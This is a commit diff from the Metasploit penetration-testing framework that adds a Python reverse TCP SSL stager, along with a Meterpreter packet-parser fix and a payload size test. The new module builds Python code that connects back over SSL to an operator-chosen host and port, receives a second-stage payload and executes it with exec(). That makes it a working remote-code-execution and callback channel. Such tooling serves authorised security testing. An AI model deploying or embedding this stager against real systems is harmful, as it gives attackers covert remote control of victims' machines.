Land rapid7#7383: Rebase/Fix + SSL stager support for python

Author: OJ

lib/msf/core/payload/python/reverse_tcp_ssl.rb

@@ -0,0 +1,66 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/python/reverse_tcp'
+
+module Msf
+
+###
+#
+# Complex reverse_tcp_ssl payload generation for Python
+#
+###
+
+module Payload::Python::ReverseTcpSsl
+
+  include Msf::Payload::Python
+  include Msf::Payload::Python::ReverseTcp
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    conf = {
+      port:        datastore['LPORT'],
+      host:        datastore['LHOST']
+    }
+
+    generate_reverse_tcp_ssl(conf)
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  def supports_ssl?
+    true
+  end
+
+  def generate_reverse_tcp_ssl(opts={})
+    # Set up the socket
+    cmd  = "import ssl,socket,struct\n"
+    cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
+    cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "s=ssl.wrap_socket(so)\n"
+    cmd << py_send_uuid if include_send_uuid
+    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
+    cmd << "d=s.recv(l)\n"
+    cmd << "while len(d)<l:\n"
+    cmd << "\td+=s.recv(l-len(d))\n"
+    cmd << "exec(d,{'s':s})\n"
+
+    py_create_exec_stub(cmd)
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    conn.put([payload.length].pack("N"))
+  end
+
+end
+
+end
+

lib/rex/post/meterpreter/packet_parser.rb

@@ -62,7 +62,8 @@ def recv(sock)
         # header size doesn't include the xor key, which is always tacked on the front
         self.payload_length_left = length_bytes.unpack("N")[0] - (HEADER_SIZE - 4)
       end
-    elsif (self.payload_length_left > 0)
+    end
+    if (self.payload_length_left > 0)
       buf = sock.read(self.payload_length_left)
 
       if (buf)

modules/payloads/stagers/python/reverse_tcp_ssl.rb

@@ -0,0 +1,30 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/core/payload/python/reverse_tcp_ssl'
+
+module MetasploitModule
+
+  CachedSize = 378
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Python::ReverseTcpSsl
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Python Reverse TCP SSL Stager',
+      'Description'   => 'Reverse Python connect back stager using SSL',
+      'Author'        => ['Ben Campbell', 'RageLtMan'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Stager'        => {'Payload' => ""}
+      ))
+  end
+
+end

spec/modules/payloads_spec.rb

@@ -2284,6 +2284,17 @@
                           reference_name: 'python/meterpreter/reverse_tcp'
   end
 
+  context 'python/meterpreter/reverse_tcp_ssl' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'stagers/python/reverse_tcp_ssl',
+                            'stages/python/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'python/meterpreter/reverse_tcp_ssl'
+  end
+
   context 'python/meterpreter/reverse_tcp_uuid' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [